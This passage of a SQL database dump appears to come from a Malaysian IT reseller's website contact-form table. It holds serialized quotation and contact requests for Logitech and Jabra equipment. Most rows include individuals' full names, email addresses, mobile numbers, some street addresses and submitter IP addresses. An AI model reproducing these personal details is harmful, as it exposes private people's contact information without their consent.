malaysia\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"87\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-24 16:32:30','14.192.211.207','1'),(119,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"yong ching ching\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"ccyong12@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"164142250\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"Greenland Tebrau Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:63:\"would like to have a quotation on from docsign service provider\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"87\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-24 20:24:27','14.192.211.207','1'),(120,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"mohamed zain\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"support@lsdmalaysia.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0172197263\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"kl lighting sdn bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:42:\"i looking for camera minrray UV510A price?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"10\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-25 10:33:24','211.25.18.180','1'),(121,12,'a:11:{i:0;a:7:{s:2:\"id\";s:3:\"126\";s:4:\"slug\";s:19:\"get-quotation-jabra\";s:4:\"name\";s:21:\"Get Quotation (Jabra)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:3:\"129\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"Fatma Nazihah Binti W. Hashim\";}i:2;a:7:{s:2:\"id\";s:3:\"130\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"fatma@cwisb.com\";}i:3;a:7:{s:2:\"id\";s:3:\"133\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"01162298992\";}i:4;a:7:{s:2:\"id\";s:3:\"131\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:35:\"Creative World Industries Sdn. Bhd.\";}i:5;a:7:{s:2:\"id\";s:3:\"135\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:88:\"No. 29, Jalan Selasih K, U12/K,Taman Cahaya Alam, Seksyen U12, 40170 Shah Alam, Selangor\";}i:6;a:7:{s:2:\"id\";s:3:\"134\";s:4:\"slug\";s:7:\"product\";s:4:\"name\";s:7:\"Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:642:\"a:19:{i:0;s:16:\"Jabra Evolve 65t\";i:1;s:15:\"Jabra Evolve 80\";i:2;s:16:\"Jabra Evolve 75e\";i:3;s:15:\"Jabra Evolve 75\";i:4;s:29:\"Jabra Evolve 65 Stereo / Mono\";i:5;s:29:\"Jabra Evolve 40 Stereo / Mono\";i:6;s:29:\"Jabra Evolve 30 Stereo / Mono\";i:7;s:29:\"Jabra Evolve 20 Stereo / Mono\";i:8;s:18:\"Jabra Evolve 20 SE\";i:9;s:15:\"Jabra Engage 50\";i:10;s:17:\"Jabra Biz 2400 II\";i:11;s:29:\"Jabra BIZ 2400 II Mono 3-in-1\";i:12;s:21:\"Jabra Biz 2400 II DUO\";i:13;s:14:\"Jabra Biz 2300\";i:14;s:17:\"Jabra BIZ 2300 QD\";i:15;s:21:\"Jabra BIZ 2300 QD DUO\";i:16;s:14:\"Jabra Biz 1500\";i:17;s:22:\"Jabra Biz 1500 DUO USB\";i:18;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Jabra Evolve 80\";}i:7;a:7:{s:2:\"id\";s:3:\"132\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:68:\"Jabra Evolve 80, Quantity = 200 unit for PTPTN tender participation.\";}i:8;a:7:{s:2:\"id\";s:3:\"125\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:3:\"127\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:3:\"128\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Jabra)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-25 11:14:45','175.139.148.129','1'),(122,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Aidiid Hafifi\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"aidiid@iqiglobal.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0176755971\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"IQI HOLDINGS SDN BHD\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:52:\"Logitech Group, Logitech Connect, Logitech PTZ Pro 2\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-26 10:01:22','61.6.51.202','1'),(123,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Lee Xian Ming\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"qs@idpm.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"012-8485044\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"IDPM Sdn. Bhd.\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"Looking for quotation for single and dual monitor arm bracket\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"17\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-26 12:25:09','202.184.111.145','1'),(124,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"FakhrulShahidan\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"fakhrul@indizium.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0179557445\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Indizium Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:50:\"Logitech PTZ Pro 2, Logitech Brio, Logitech C9230e\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:277:\"Please give price for dealer as we are not the end user.end user : Dutch Lady.I tick Logitech C9230e but actually for C930e.Hope can give me price asap if possible.Second,do you have any wall mount for webcam for Bario or C930e? if yes,please include it.All quantity is 1 unit.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-26 16:06:53','175.138.56.123','1'),(125,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Ooi Kim Lan\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"michelle@chaintope.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0135656863\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"Chaintope Malaysia Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:123:\"Level 3, Vertical Corporate Tower B, Avenue 10, The Vertical, Bangsar South City, No.8, Jalan Kerinchi, 59200 Kuala Lumpur.\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:109:\"We would like to get the item delivered to us latest by Friday morning. Please let us know if it is possible.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"88\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-27 11:18:51','192.228.167.204','1'),(126,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"azman\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"emages7@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122599497\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company 